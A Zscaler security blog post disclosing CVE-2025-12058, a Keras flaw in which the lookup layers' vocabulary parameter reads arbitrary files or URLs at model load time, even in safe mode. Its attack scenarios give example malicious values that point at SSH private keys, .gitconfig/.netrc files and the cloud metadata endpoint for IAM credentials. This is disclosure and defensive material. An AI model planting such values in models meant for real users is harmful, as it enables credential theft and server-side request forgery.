Blog de Zscaler

Reciba en su bandeja de entrada las últimas actualizaciones del blog de Zscaler

Security Research

Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058)

image

Summary

Zscaler uncovered a vulnerability in Keras that exposed AI and machine learning environments to file access and network exploitation risks, highlighting the urgent need to secure the AI model supply chain. Through responsible disclosure and ongoing research, Zscaler helps enterprises stay protected from emerging AI threats with a Zero Trust approach. 

Key Takeaways

Technical analysis of CVE-2025-12058. The Keras model vulnerability root cause analysis, attack vectors, and disclosure details.

  • AI models increasingly introduce new security risks. Even trusted frameworks can contain flaws that expose data or systems and become attack vectors.
  • Research and disclosure make AI safer. Transparent information sharing of CVEs and other key discoveries is a critical safety component across the open-source and security communities.
  • Securing the AI supply chain is essential. Enterprises must verify the integrity of models, code, and data sources to prevent compromise through AI.
  • Zero Trust principles extend to AI. The same verification principles that protect users and apps also apply to AI.
  • Zscaler is leading in AI security. Our research and technology help organizations embrace transformation and use AI safely. 

Overview 

Keras Model - Arbitrary File Access and Server-Side Request Forgery

Zscaler identified a vulnerability in Keras 3.11.3 and earlier that allows arbitrary file access and potential Server-Side Request Forgery (SSRF) when loading malicious .keras model files.
The flaw exists in the StringLookup and IndexLookup preprocessing layers, which permit file paths or URLs in their vocabulary parameter. When loading a serialized model (.keras file), Keras reconstructs these layers and accesses the referenced paths during deserialization - even with safe_mode=True enabled.

This behavior bypasses user expectations of "safe" deserialization and can lead to:

  • Arbitrary local file read (e.g., /etc/passwd, SSH keys, credentials)
  • Server-Side Request Forgery (SSRF) when network schemes are supported
  • Information disclosure via vocabulary exfiltration

Zscaler responsibly disclosed the issue to the Keras development team. The vulnerability is tracked as CVE-2025-12058 with a CVSS score of 5.9 (Medium) and was fixed in Keras version 3.11.4.

Technical Analysis of CVE-2025-12058

The vulnerability stems from how Keras handles model reconstruction during loading. Preprocessing layers (StringLookup and IndexLookup) allow file paths or URLs to be passed as input to define their vocabularies. When a .keras model is deserialized, these paths are automatically opened and read by TensorFlow’s file I/O system without proper validation or restriction. This means that even when security features like safe_mode are enabled, a malicious model can still instruct Keras to access local files or external URLs during load time, exposing sensitive data or enabling remote network requests. 

Affected Components

  • Layers: keras.layers, StringLookup, keras.layers, IndexLookup, potentially IntegerLookup
  • Versions: Keras 3.11.3 (and likely earlier 3.x versions)
  • Backend: Confirmed with TensorFlow backend 2.20.0
  • Default Settings: Reproduces with safe_mode=True, no custom objects required

Root Cause

The StringLookup and IndexLookup layers accept a vocabulary parameter that can be either:

  1. An inline list/array of tokens
  2. A string path to a vocabulary file

During model deserialization, if the vocabulary is a string path, Keras uses TensorFlow's tf.io.gfile APIs to read the file. This filesystem API supports:

  • Absolute local paths (e.g., /etc/passwd)
  • file:// URLs
  • Network URLs (http://, https://) when TensorFlow-IO is present

Critical Issue: safe_mode=True guards against unsafe callable deserialization but does not restrict I/O operations performed by built-in layers during reconstruction.

Real-World Impact Scenarios

ML Model Hub Compromise

Attackers upload a malicious .keras model to a public repository (e.g., Hugging Face, Kaggle).
When a victim downloads and loads the model, SSH private keys or local configuration files may be exposed.

Attack vector:

  1. Attacker uploads a malicious .keras model file to the public repository
  2. The model's StringLookup layer is configured with vocabulary="/home/victim/.ssh/id_rsa"
  3. Victim downloads and loads the model for evaluation or fine-tuning
  4. SSH private key contents are read into the model's vocabulary during deserialization
  5. Attacker retrieves the key by re-downloading the model or through vocabulary exfiltration

Potential impact: complete compromise of victim's SSH access to servers, code repositories, and cloud infrastructure. Attackers can pivot to active intrusion: clone private repos, inject backdoors or malicious commits into CI/CD, execute code in production, and move laterally.

Cloud Credential Theft

ML engineers deploying models in AWS/GCP/Azure environments with instance metadata services. Malicious model references metadata endpoints (e.g., http://169.254.169.254/) so loading it in a cloud VM/container returns IAM credentials.

Attack vector:

  1. Attacker crafts a model with vocabulary="http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
  2. Model is loaded in a cloud VM or container with IAM role attached
  3. AWS credentials (access key, secret key, session token) are fetched at load time
    Credentials populate the vocabulary and can be exfiltrated via get_vocabulary()

Potential impact: Full access to cloud resources under the compromised role. Attackers can take over infrastructure, exfiltrate data, deploy ransomware or crypto mining, erase logs, and pivot access across accounts. 

Supply Chain Attack via Pre-trained Models

Attacker publishes or poisons a popular pre-trained model that references local credential files (.gitconfig, .netrc) so CI/CD or developer machines leak tokens when the model is loaded. Development teams using third-party pre-trained models for transfer learning may import these models and expose Git tokens, API keys, and source code.

Attack vector:

  1. Attacker compromises a popular pre-trained model repository or creates a malicious "state-of-the-art" model
  2. Model contains StringLookup with vocabulary="file:///home/developer/.gitconfig" or "file:///home/developer/.netrc"
  3. Developers load the model in CI/CD pipelines or local development environments
  4. Git credentials, authentication tokens, and repository access details are extracted
  5. Attacker gains access to private source code repositories

Potential impact: Stolen dev credentials enable source code/IP theft and insertion of malicious code and backdoors into builds and signed artifacts. Backdoor releases can propagate downstream to customers and partners, triggering widespread compromise.

How Zscaler Discovered CVE-2025-12058

This vulnerability was discovered during Zscaler's ongoing security research into AI/ML framework security and model supply chain risks. While analyzing Keras preprocessing layers, researchers observed that certain deserialization routines allowed file operations to execute before security controls were applied. Further analysis revealed that TensorFlow’s file handling APIs could access both local and remote resources through path references embedded in model files. This discovery highlights how even seemingly safe model loading mechanisms can expose enterprise systems to data exfiltration or SSRF attacks when handling untrusted AI models.  

Discovery: Investigation of the StringLookup and IndexLookup layers accept a vocabulary parameter that can be either an inline list or a file path.

Deep inspection of the deserialization code revealed that:

  1. File paths in the vocabulary parameter are resolved using TensorFlow's tf.io.gfile API during model loading.
  2. This file access occurs before any safe_mode checks on custom objects.
  3. The API supports not just local paths but also file:// URLs and network schemes.

As enterprises increasingly adopt AI/ML technologies, Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments.

Detection and Prevention with Zscaler AI Security Posture Management (AISPM)

Zscaler’s AI Security Posture Management (AISPM) solution provides protection against malicious or compromised AI models before deployment. This enterprise-grade security platform automatically detects CVE-2025-12058 and similar vulnerabilities in real-time.

Its Model Scanning Engine performs:

  • Deep inspection of ML model files (Keras, PyTorch, TensorFlow, ONNX)
  • Static analysis to detect suspicious paths and network references
  • Identification of SSRF or arbitrary file access vectors
  • Binary-level inspection for embedded payloads.

The example below shows Zscaler AISPM detecting the Keras Vocabulary Injection vulnerability in a model file:

Image

Zscaler AISPM enables organizations to secure their AI supply chain by preventing malicious models from infiltrating development and production environments, providing complete visibility into AI security risks across the enterprise.

Disclosure Timeline

Sept 26, 2025 - Vulnerability reported to Keras team

Oct 14, 2025 - Vendor confirmed reproduction

Oct 20, 2025 - Fix released

Oct 22, 2025 - CVE-2025-12058 assigned

CVE-2025-12058 Disclosure Timeline

Conclusion

As enterprises increasingly integrate AI/ML technologies, securing the model supply chain becomes essential.

Zscaler remains dedicated to identifying and mitigating security risks before they can be exploited in production environments, advancing trust in the evolving AI ecosystem.

References

  • CVE-2025-12058 with a CVSS score of 5.9 (Medium) CVSS 4.0: AV:A/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L
  • Keras Fix PR for version 3.11.4
  • GitHub Advisory

Learn More

To explore the broader landscape of AI-driven threats and how to secure against these real-world attacks, read the Zscaler ThreatLabz 2025 AI Security Report

form submtited
Gracias por leer

¿Este post ha sido útil?

Descargo de responsabilidad: Esta entrada de blog ha sido creada por Zscaler con fines únicamente informativos y se proporciona "tal cual" sin ninguna garantía de exactitud, integridad o fiabilidad. Zscaler no asume ninguna responsabilidad por cualquier error u omisión o por cualquier acción tomada en base a la información proporcionada. Cualquier sitio web de terceros o recursos vinculados en esta entrada del blog se proporcionan solo por conveniencia, y Zscaler no es responsable de su contenido o prácticas. Todo el contenido está sujeto a cambios sin previo aviso. Al acceder a este blog, usted acepta estos términos y reconoce su exclusiva responsabilidad de verificar y utilizar la información según convenga a sus necesidades.

Reciba en su bandeja de entrada las últimas actualizaciones del blog de Zscaler

Al enviar el formulario, acepta nuestra política de privacidad.